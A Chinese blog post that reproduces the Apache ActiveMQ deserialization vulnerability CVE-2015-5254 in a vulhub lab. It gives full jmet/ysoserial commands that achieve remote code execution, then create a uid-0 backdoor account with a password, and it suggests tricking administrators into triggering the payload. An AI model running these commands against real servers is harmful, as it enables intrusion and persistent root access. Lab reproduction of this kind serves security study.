前言:又来复现漏洞了!
基本的实验环境就不演示了,可以查看我以前的博客,开整吧!

漏洞详情
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类
漏洞危害#
远程攻击者可借助特制的序列化的Java MessageService(JMS)ObjectMessage对象利用该漏洞执行任意代码
漏洞编号#
CVE-2015-5254
影响范围#
Apache ActiveMQ 5.13.0之前5.x版本中
修复建议#
升级到最新版本

有WAF的可以配置相关规则进行拦截

实验环境

攻击机:kali 2020.2
靶机:CentOS Linux 7
项目地址:https://github.com/vulhub/vulhub

基础环境搭建

查看我以前的博客自行搭建

实验环境搭建
项目地址

https://github.com/vulhub/vulhub

下载后上传至任意目录,进入目录

vulhub-master/vulhub-master/activemq/CVE-2015-5254

启动docker编译

docker-compose up -d

环境运行后,将监听61616和8161两个端口其中61616是工作端口,消息在这个端口进行传递;8161是网络管理页面端口访问http://192.168.91.133:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。默认的用户名/密码为admin/admin

复现步骤
1.漏洞利用过程如下:
a.构造(可以使用ysoserial)可执行命令的序列化对象
b.作为一个消息,发送给目标61616端口
c.访问的Web管理页面,读取消息,触发漏洞

2.使用jmet进行漏洞利用:
首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial是gadget中选择一个可以使用的,比如ROME。

cd /opt
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external

执行命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME   192.168.91.133   6161

此时会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://192.168.91.133:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息

点击查看这条消息即可触发命令执行

此时进入容器

docker ps   查看容器id
docker exec -it  cc0e9385f975  /bin/bash  进入容器

可看到/ tmp /success已成功创建,说明漏洞利用成功:

利用漏洞添加用户

1.执行jmet的命令添加test用户并将其添加到root组,返回http://192.168.91.133:8161/admin/browse.jsp?JMSDestination=event页面,点击一下消息,触发它:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "useradd -g root -s /bin/bash -u 10010 test" -Yp ROME  192.168.91.133  61616

2.让我们再将passwd中的test的uid修改为0,使它拥有root权限,返回http://192.168.91.133:8161/admin/browse.jsp?JMSDestination=event页面,点击一下消息,触发它。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "sed -i "s/test:x:10010/test:x:0/g" /etc/passwd" -Yp ROME   192.168.91.133  61616

3.让我们再为test用户设置一个密码,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event页面,点击一下消息,触发它。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "echo "test:sd123456" | chpasswd" -Yp ROME   192.168.91.133   61616



到此为止,一个权限为root,密码为123456的用户即创建完毕。我们可以使用ssh直接远程登陆进入操作系统,并且还是最高权限。如此还可以写文件、弹shell等,可以自行发挥

值得注意的是,通过网络管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。

apache ActiveMQ反序列化漏洞(CVE-2015-5254)复现相关推荐

  1. ActiveMQ反序列化漏洞(CVE-2015-5254)复现

    0x00 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等.Apache A ...

  2. 【漏洞复现】Apache Shiro 反序列化漏洞

    Apache Shiro 反序列化漏洞 一.简介 二.环境 三.漏洞原理 四.AES秘钥 1.判断AES秘钥 五.Shiro rememberMe反序列化漏洞(Shiro-550) 1.版本1.4.2 ...

  3. java反序列化漏洞 tomcat_CVE-2020-9484 Apache Tomcat反序列化漏洞浅析

    本文是i春秋论坛作家「Ybwh」表哥原创的一篇技术文章,浅析CVE-2020-9484 Apache Tomcat反序列化漏洞. 01漏洞概述 这次是因为错误配置和org.apache.catalin ...

  4. Apache Shiro 反序列化漏洞 [org.apache.shiro.web.mgt.CookieRememberMeManager]

    Apache Shiro 反序列化漏洞 2021-02-06 02:34:09,886 [http-bio-8000-exec-18] WARN  [org.apache.shiro.mgt.Defa ...

  5. XStream 反序列化漏洞 (CVE-2020-26258 26259) 的复现与分析

     聚焦源代码安全,网罗国内外最新资讯! Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象.XStream 是一款开源软件,允许在 BSD 许可证的许可下分 ...

  6. shiro反序列化漏洞的原理和复现

    一.shiro简介 Shiro是一个强大的简单易用的Java安全框架,主要用来更便捷的认证,授权,加密,会话管理.Shiro首要的和最重要的目标就是容易使用并且容易理解. 二.shiro的身份认证工作 ...

  7. java反序列化漏洞:2015年被低估的“破坏之王”

    近日,2015年最为被低估的,具有巨大破坏力的漏洞浮出水面.在FoxGlove Security安全团队的@breenmachine 发布一篇博客中介绍了该漏洞在最新版的WebLogic.WebSph ...

  8. Apache Shiro-721反序列化漏洞复现(vulhub)

    下载并启动环境 docker pull vulfocus/shiro-721 docker run -d -p 8080:8080 vulfocus/shiro-721 登录网页 输入用户名和密码并勾 ...

  9. CVE-2020-9496:Apache Ofbiz 反序列化漏洞分析

    原创 360CERT [三六零CERT](javascript:void(0)

  10. APACHE OFBIZ XML-RPC 反序列化漏洞 (CVE-2020-9496) 的复现与分析

     聚焦源代码安全,网罗国内外最新资讯! 1.1 状态 完成漏洞挖掘条件分析.漏洞复现. 1.2 简介 相关的重点类和方法: org.apache.xmlrpc.parser.SerializableP ...

最新文章

  1. 用BlockingQueue实现生产者与消费者问题
  2. Forrester 2011年安全策略建议
  3. 文本挖掘(part3)--词袋模型
  4. vue/return-in-computed-property Enforce that a return statement is present in computed property
  5. 【渝粤题库】广东开放大学 秘书实务 形成性考核
  6. 【渝粤题库】国家开放大学2021春2219房屋构造与维护管理题目
  7. C语言sendto()函数:经socket传送数据
  8. hdu 3079水题
  9. 如何编程得到数据库信息
  10. 9种让肌肤美白的简单方法 - 生活至上,美容至尚!
  11. 编程实现 无符号乘法溢出判断
  12. mysql无法添加服务_MySQL无法开启服务
  13. 基于mykernel的时间片轮转调度
  14. C++算法学习(力扣:134. 加油站)
  15. .Net Core中对FluentEmail.Smtp进行封装使用
  16. 【浙大第19届校赛:B】Even Number Theory (数论n!中有多少个质因子2+java大数)
  17. springboot vue导出excel 使用easypoi
  18. nodejs 下载url文件
  19. oracle+linux+oel+6.9,Oracle 11g(11.2.0.4) install on OEL6.7
  20. 华顺信安 白帽汇安全研究院一面复盘

热门文章

  1. 七夕到了 —— 属于 Java 的浪漫,拿去吧~ 祝表白成功
  2. python_文件统计问题:文件” seqs_fasta.txt”保存着具有fasta格式的100多个蛋白质氨基酸序列
  3. 微信再次重大更新,同时支持5个浮窗展示,你怎么看?
  4. apiCloud实现微信分享功能
  5. 鸿蒙只是电视机,荣耀智慧屏首发抢先体验:电视只是小功能,鸿蒙系统才是真亮点...
  6. [CTF]盲文对照表
  7. 11月27日“软件开发模式思考:传统与敏捷 我们在什么位置?”的主题活动成功举办
  8. 微信小程序获得二维码
  9. NCS初探--基于nRF5340的blinky
  10. 接近开关 NPN 与 PNP的区别